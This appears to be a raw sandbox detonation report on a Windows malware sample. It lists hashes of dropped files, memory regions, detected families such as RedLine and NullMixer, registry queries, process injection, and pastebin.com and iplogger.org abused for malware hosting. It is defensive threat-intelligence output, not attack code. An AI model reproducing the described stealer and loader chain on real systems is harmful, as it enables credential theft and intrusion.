SHA512 e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004

\Users\Admin\AppData\Local\Temp\is-OOOHO.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2892-75-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1724-79-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2552-81-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2404-89-0x0000000000300000-0x0000000000308000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8.exe

MD5 360e4cdd67c04428d4a9b9b59d352584
SHA1 de633409edc357f21da340992cbb035350001254
SHA256 01a005463e33fb90c1b77e0fcee36f5e7856fe6868313df3c1fe123fe4c1e1a8
SHA512 e0c9056943d7e70f5e506696ce9b0236d083fe6cb08fb7511355fac380da3b56fad552789053d58de06b5e980fd38319b865be962b09e1d3f2f46a84ef177084

\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

MD5 f7f7ab4f0a4d1c8d127a1c6bb4c0ea6e
SHA1 d7462d88f1fb9904fe3f1e937e2ebc0809607f8a
SHA256 f564d99d0ce406b1ca653ad2d3c40d6d4c6d9304729fd47a22bb6157be6294a6
SHA512 95e156b95132d6a7df5c15ba7f7d0b6d683a16e46c83716090a83a4cf1016f5a9e45ec45026f05287f55596bd669fac5b1873d89779795011ff7bd4484aab7e2

\Users\Admin\AppData\Local\Temp\nstF2F.tmp\System.dll

MD5 fbe295e5a1acfbd0a6271898f885fe6a
SHA1 d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256 a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA512 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

\Users\Admin\AppData\Local\Temp\nstF2F.tmp\INetC.dll

MD5 2b342079303895c50af8040a91f30f71
SHA1 b11335e1cb8356d9c337cb89fe81d669a69de17e
SHA256 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f
SHA512 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe

MD5 89d1bd67214042bde02749afdc91b85f
SHA1 bd3b9b45fecb02a8d38a3f2dab7de14a3e4f8ea4
SHA256 4672ca322e9d03b30223452f9d9be6e78d957ef47fc046fc60a1fffc1edad1e0
SHA512 bacf183ae91cd2f8521f5ff376a2f004b2222738b5ffe2c69d623b33266186ccc7036fb255591af1d3b7f1003376950486e42cb1dc202a60ffd597a7227a15ad

memory/1540-140-0x0000000001100000-0x0000000001108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Jonba.exe

MD5 3434b3e59d0dc8d25ff3e83ced5d6f87
SHA1 1cfc6af2e22fc55e8bcbce2cbe0ea572cff11d8f
SHA256 f2201a75165335d71b3f303fb46db6b8e6e160cba924bc02b2409da5c8c83b40
SHA512 6f7850598937f930a6732a1e713ebe47cc716fe9e32a68623378c8143c57da1f51f4af97f6886bce3f48b8a04b0bd540839eee23ca0926f6bf44c2f5af12980a

C:\Users\Admin\AppData\Local\Temp\RarSFX1\WcWfz1Tn.MJ

MD5 e1caa9cc3b8bd60f12093059981f3679
SHA1 f35d8b851dc0222ae8294b28bd7dee339cc0589b
SHA256 254b6e6f43b2707ac107664b163ba074051b0534aafa8faf85a1760299182565
SHA512 23f3fa616c1a96acd9a781d833a69ac37a9989dc5605396ecde41beae971b287bc963ea8020c56d92034e7e284c37639280650e1674864707ba859ad5815cdfa

C:\Users\Admin\AppData\Local\Temp\RarSFX1\1w8lBDVH.aou

MD5 112b8c9fa0419875f26ca7b592155f2b
SHA1 0b407062b6e843801282c2dc0c3749f697a67300
SHA256 95ae984c19dbf91919296efb398aaf700605910a28abe9288c7639c7d9223202
SHA512 a71e187dbc18c2d7cd21b1e856ee7d58e230b801758ed6a2205e8dacdc8235a09111014cff3171ea82e8942251508ada57eefdbcbc13daddbfbe30eddc29dad8

C:\Users\Admin\AppData\Local\Temp\RarSFX1\MyBa.V

MD5 51424c68f5ff16380b95f917c7b78703
SHA1 70aa922f08680c02918c765daf8d0469e5cd9e50
SHA256 065f5b48408abb0260d68775e6db36136c8ac2bd7c8a1168613cc5cb8825d315
SHA512 c7510a9555402d64665bcbce661eb54c1bcbb20095c084036d8af625de9d0bf93cb33e93cbc9b6efbc73f9080ef7052dcbc35fb8d44ccf56fb2db8af933e06af

C:\Users\Admin\AppData\Local\Temp\RarSFX1\9Bu~.w

MD5 8b4e06aede42785b01c3cdf3f0883da6
SHA1 664fdc12cb0141ffd68b289eaaf70ae4c5163a5a
SHA256 8a8d67872f0bc6e6669f7396a84b879d12882ea495467b09b6613edfc4108c42
SHA512 7b6a20e41365c546f1aa5a84964b36fc4cedd194754d1f09cfdadf822f4141d037067811ca62a7d2da23ec1e332943cb828d4f771308fdfa79327cb3fb6f2c82

C:\Users\Admin\AppData\Local\Temp\RarSFX1\hKS2IU.1Q

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/1860-212-0x00000000028E0000-0x00000000038E0000-memory.dmp

memory/2772-213-0x0000000000400000-0x0000000002F74000-memory.dmp

memory/2892-214-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1880-215-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1860-217-0x00000000028E0000-0x00000000038E0000-memory.dmp

memory/2216-223-0x0000000000110000-0x0000000000330000-memory.dmp

memory/2216-224-0x000000001B360000-0x000000001B580000-memory.dmp

memory/1860-225-0x000000002D360000-0x000000002D406000-memory.dmp

memory/1860-229-0x000000002D410000-0x000000002D4A3000-memory.dmp

memory/1860-226-0x000000002D410000-0x000000002D4A3000-memory.dmp

memory/1860-239-0x000000002D410000-0x000000002D4A3000-memory.dmp

memory/1860-240-0x000000002D4B0000-0x000000002E316000-memory.dmp

memory/1860-241-0x000000002E320000-0x000000002E3AD000-memory.dmp

memory/1860-242-0x000000002E3B0000-0x000000002E438000-memory.dmp

memory/1860-243-0x000000002E3B0000-0x000000002E438000-memory.dmp

memory/1860-245-0x000000002E3B0000-0x000000002E438000-memory.dmp

memory/1860-246-0x0000000000090000-0x0000000000093000-memory.dmp

memory/1860-247-0x00000000000A0000-0x00000000000A5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 816520bddbb9cd95a5904ba5c6626989
SHA1 d6aca0489429c82eab0f5e213f1ca93648a36eb2
SHA256 8877b12798309300f6f18ac44e2c4770076c152b5ba36f17b8bf94338adc178a
SHA512 2db4fb133d24d8cd8905c42e8affab1efd322efa740ba8381de4a0f610a2492a78dfc42761d85d7df13334938da7ddd0fe95a6066ff3d40f03c2f71f2f5660c3

memory/2656-262-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-260-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-270-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-276-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-274-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-272-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-268-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-266-0x0000000140000000-0x0000000140786000-memory.dmp

memory/2656-264-0x0000000140000000-0x0000000140786000-memory.dmp

memory/1620-307-0x0000000001C60000-0x0000000001C66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f78be40.exe

MD5 a014b8961283f1e07d7f31ecdd7db62f
SHA1 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065
SHA256 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89
SHA512 bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869

memory/2220-321-0x0000000000A80000-0x0000000000A88000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

10s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3824 set thread context of 1064 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\control.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06ebc37d1c94352.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3160 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3160 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3160 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3368 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
PID 3368 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
PID 3368 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe
PID 3952 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3468 wrote to memory of 116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3952 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3952 wrote to memory of 996 N/A C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1736 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
PID 1736 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
PID 1736 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe
PID 5112 wrote to memory of 3824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 5112 wrote to memory of 3824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 5112 wrote to memory of 3824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WerFault.exe
PID 540 wrote to memory of 1428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe
